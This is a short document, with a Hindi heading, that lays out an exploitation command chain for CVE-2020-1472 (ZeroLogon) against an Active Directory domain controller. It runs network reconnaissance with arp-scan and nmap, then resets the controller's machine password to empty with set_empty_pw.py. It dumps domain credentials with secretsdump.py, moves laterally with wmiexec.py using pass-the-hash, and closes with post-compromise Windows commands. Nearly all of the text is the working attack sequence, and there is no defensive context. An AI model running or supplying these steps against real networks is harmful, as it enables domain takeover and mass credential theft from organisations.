
CVE-2020-1472 (ZeroLogon) के लिए शोषण स्क्रिप्ट जिसमें स्वचालित विशेषाधिकार वृद्धि, secretsdump के माध्यम से क्रेडेंशियल डंपिंग, और Active Directory डोमेन समझौते के लिए wmiexec का उपयोग करके पार्श्व गति शामिल है।
arp-scan Rang_ip
nmap -A -vv -Pn IP_ADDR
python3 set_empty_pw.py DC_NETBIOS_NAME DC_IP_ADDR
python3 secretsdump.py -no-pass -just-dc DOMAIN/DC_NETBIOS_NAME$@DC_IP_ADDR
python3 wmiexec.py -hashes Hass_Passwd_User DOMAIN/User@dc_ip_addr
#विंडोज कमांड
whoami
systeminfo
hostname
md test_dir
echo test > test_file